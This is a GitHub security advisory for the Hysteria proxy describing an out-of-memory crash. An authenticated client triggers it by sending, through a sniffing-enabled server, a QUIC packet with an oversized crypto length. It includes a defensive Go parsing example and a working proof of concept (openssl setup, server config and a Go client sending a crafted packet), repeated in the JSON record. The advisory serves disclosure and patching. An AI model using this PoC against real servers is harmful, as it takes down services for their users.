GHSA-9FW6-XGG2-MQ9Q

Vulnerability from github – Published: 2026-05-05 21:14 – Updated: 2026-05-05 21:14
Summary
Hysteria: A specially constructed QUIC packet can crash the server with an OOM when sniffing is enabled
Details

Summary

A specially constructed QUIC packet can crash the server with an out-of-memory (OOM) condition when sniffing is enabled.

Details

When the server has sniffing enabled, any authenticated client can ask the server to forward UDP traffic and send a QUIC packet whose crypto length field claims a huge size. The server allocates a buffer sized by that untrusted length, which exhausts memory and causes an OOM.
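The allocation pattern described above, shown as an added defensive example written for this page: it is not Hysteria's sniffing code, and it parses a plaintext QUIC CRYPTO frame (type 0x06 with Offset and Length encoded as RFC 9000 variable-length integers) rather than a whole Initial packet. The two sample frames, the `maxCryptoDataPerDatagram` cap and the function names are assumptions made for the illustration. The unchecked parser sizes its buffer from the peer's Length field, which is the defect class the advisory describes; the checked parser refuses any Length larger than the bytes actually present in the datagram before allocating anything.

```go
package main

import (
	"errors"
	"fmt"
)

// QUIC frame type for CRYPTO frames (RFC 9000, section 19.6).
const frameTypeCrypto = 0x06

// Upper bound on crypto data one datagram can carry. Chosen for this example:
// a single UDP datagram cannot exceed 65535 bytes, so a larger claimed Length
// can never be backed by real data and is rejected outright.
const maxCryptoDataPerDatagram = 65535

var errTruncated = errors.New("truncated frame")

// readVarInt decodes a QUIC variable-length integer (RFC 9000, section 16):
// the two high bits of the first byte select a width of 1, 2, 4 or 8 bytes.
func readVarInt(b []byte) (value uint64, n int, err error) {
	if len(b) == 0 {
		return 0, 0, errTruncated
	}
	n = 1 << (b[0] >> 6)
	if len(b) < n {
		return 0, 0, errTruncated
	}
	value = uint64(b[0] & 0x3f)
	for i := 1; i < n; i++ {
		value = value<<8 | uint64(b[i])
	}
	return value, n, nil
}

// cryptoHeader parses the fixed part of a CRYPTO frame (type, Offset, Length)
// and returns the claimed Length plus the index where the crypto data starts.
func cryptoHeader(frame []byte) (offset, length uint64, dataStart int, err error) {
	if len(frame) == 0 || frame[0] != frameTypeCrypto {
		return 0, 0, 0, errors.New("not a CRYPTO frame")
	}
	pos := 1
	var n int
	if offset, n, err = readVarInt(frame[pos:]); err != nil {
		return 0, 0, 0, err
	}
	pos += n
	if length, n, err = readVarInt(frame[pos:]); err != nil {
		return 0, 0, 0, err
	}
	pos += n
	return offset, length, pos, nil
}

// parseCryptoDataUnchecked is the weak pattern: the peer-supplied Length drives
// the allocation before anyone checks that the bytes exist. Kept only to sit
// beside the hardened form below.
func parseCryptoDataUnchecked(frame []byte) ([]byte, error) {
	_, length, start, err := cryptoHeader(frame)
	if err != nil {
		return nil, err
	}
	buf := make([]byte, length) // sized by untrusted input
	copy(buf, frame[start:])
	return buf, nil
}

// parseCryptoDataChecked is the hardened form: Length is validated against the
// datagram cap and the bytes actually present before any allocation happens.
func parseCryptoDataChecked(frame []byte) ([]byte, error) {
	offset, length, start, err := cryptoHeader(frame)
	if err != nil {
		return nil, err
	}
	avail := uint64(len(frame) - start)
	switch {
	case length > maxCryptoDataPerDatagram:
		return nil, fmt.Errorf("crypto length %d exceeds datagram limit %d", length, maxCryptoDataPerDatagram)
	case length > avail:
		return nil, fmt.Errorf("crypto length %d but only %d bytes present", length, avail)
	case offset+length > 1<<62-1: // RFC 9000: Offset + Length must stay below 2^62
		return nil, errors.New("crypto offset+length out of range")
	}
	out := make([]byte, length) // bounded by avail, so never larger than the datagram
	copy(out, frame[start:start+int(length)])
	return out, nil
}

// Constructed sample frames for the example (not captured traffic).
var (
	// type=0x06, offset=0, length=5, data="hello"
	validFrame = []byte{0x06, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o'}
	// type=0x06, offset=0, length=1048576 (4-byte varint 80 10 00 00), only 5 data bytes follow
	oversizedFrame = []byte{0x06, 0x00, 0x80, 0x10, 0x00, 0x00, 'h', 'e', 'l', 'l', 'o'}
)

func main() {
	data, err := parseCryptoDataChecked(validFrame)
	fmt.Printf("checked, valid frame: %q err=%v\n", data, err)

	buf, err := parseCryptoDataUnchecked(oversizedFrame)
	fmt.Printf("unchecked, oversized frame: allocated %d bytes err=%v\n", len(buf), err)

	_, err = parseCryptoDataChecked(oversizedFrame)
	fmt.Printf("checked, oversized frame: err=%v\n", err)
}
```

The oversized frame claims 1 MiB of crypto data while carrying five bytes; the unchecked parser dutifully allocates the full 1 MiB, and a peer that raises the claimed Length to the varint maximum turns that into the memory exhaustion the advisory reports. The checked parser rejects it before `make` runs, so the cost of a bad frame is a returned error, not an allocation.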

PoC

openssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj "/CN=localhost" 2>/dev/null

server.yaml

listen: :8443
tls:
  cert: localhost.crt
  key: localhost.key
auth:
  type: password
  password: mypassword
sniff:
  enable: true
outbounds:
  - name: my_direct
    type: direct
    default: true

poc.go

package main

import (
    "flag"
    "fmt"
    "log"
    "net"
    "time"

    "github.com/apernet/hysteria/core/v2/client"
)

func main() {
    serverAddrStr := flag.String("server", "127.0.0.1:8443", "Hysteria server address")
    password := flag.String("password", "mypassword", "Hysteria server password")
    flag.Parse()

    serverAddr, err := net.ResolveUDPAddr("udp", *serverAddrStr)
    if err != nil {
        log.Fatalf("Invalid server address: %v", err)
    }
    c, _, err := client.NewClient(&client.Config{
        ServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},
    })
    if err != nil {
        log.Fatalf("Failed to connect: %v", err)
    }
    defer c.Close()

    // Crafted QUIC packet from the advisory; its crypto length field is the
    // value the sniffing server trusts when sizing its buffer.
    var maliciousQUICPacket = []byte{
        0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,
        0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,
        0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70,
        0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65,
        0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2,
    }

    udpConn, err := c.UDP()
    if err != nil {
        // udpConn is not usable when this fails, so stop instead of continuing.
        log.Fatalf("[-] UDP error: %v", err)
    }
    targetAddr := "8.8.8.8:443"
    fmt.Printf("[*] Sending 'death' packet to %s...\n", targetAddr)
    if err := udpConn.Send(maliciousQUICPacket, targetAddr); err != nil {
        log.Fatalf("[-] Send error: %v", err)
    }

    // Wait longer to ensure packet delivery
    time.Sleep(3 * time.Second)
    fmt.Printf("[+] Done.\n")
}

Impact

When sniffing is enabled on the server, any client holding a valid password can cause the server to run out of memory (OOM).


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/apernet/hysteria/core/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:14:22Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA specially constructed quic package can crash the server OOM when the sniff is enabled.\n\n### Details\n\nWhen the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.\n\n\n### PoC\n```\nopenssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj \"/CN=localhost\" 2\u003e/dev/null\n```\n\nserver.yaml\n```\nlisten: :8443\ntls:\n  cert: localhost.crt\n  key: localhost.key\nauth:\n  type: password\n  password: mypassword\nsniff:\n  enable: true\noutbounds:\n  - name: my_direct\n    type: direct\n    default: true\n```\n\npoc.go\n\n```\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"time\"\n\n\t\"github.com/apernet/hysteria/core/v2/client\"\n)\n\nfunc main() {\n\tserverAddrStr := flag.String(\"server\", \"127.0.0.1:8443\", \"Hysteria server address\")\n\tpassword := flag.String(\"password\", \"mypassword\", \"Hysteria server password\")\n\tflag.Parse()\n\n\tserverAddr, _ := net.ResolveUDPAddr(\"udp\", *serverAddrStr)\n\tc, _, err := client.NewClient(\u0026client.Config{\n\t\tServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},\n\t})\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to connect: %v\", err)\n\t}\n\tdefer c.Close()\n                                                                                                                \n\tvar maliciousQUICPacket = []byte{                                                                                                                                                                         \n\t\t0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,                                                                                                              \n\t\t0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 
0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,                                                                                                             \n\t\t0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70,                                                                                                              \n\t\t0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65,                                                                                                             \n\t\t0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2,                                                                                                                                                                   \n\t} \n\n\tudpConn, err := c.UDP()\n\tif err != nil {\n\t\tfmt.Printf(\"[-] UDP error: %v\\n\", err)\n\t}\n\ttargetAddr := fmt.Sprintf(\"8.8.8.8:443\")\n\tfmt.Printf(\"[*] Sending \u0027death\u0027 packet to %s...\\n\", targetAddr)\n\t_ = udpConn.Send(maliciousQUICPacket, targetAddr)\n\n\t// Wait longer to ensure packet delivery\n\ttime.Sleep(3 * time.Second)\n\tfmt.Printf(\"[+] Done.\\n\")\n}\n```\n\n\n### Impact\nWhen sniffing is enabled on the server, a user with a valid password can launch an attack that could cause the server to run out of memory (OOM).",
  "id": "GHSA-9fw6-xgg2-mq9q",
  "modified": "2026-05-05T21:14:22Z",
  "published": "2026-05-05T21:14:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apernet/hysteria"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hysteria: A specially constructed quic package can crash the server OOM when the sniff is enabled"
}

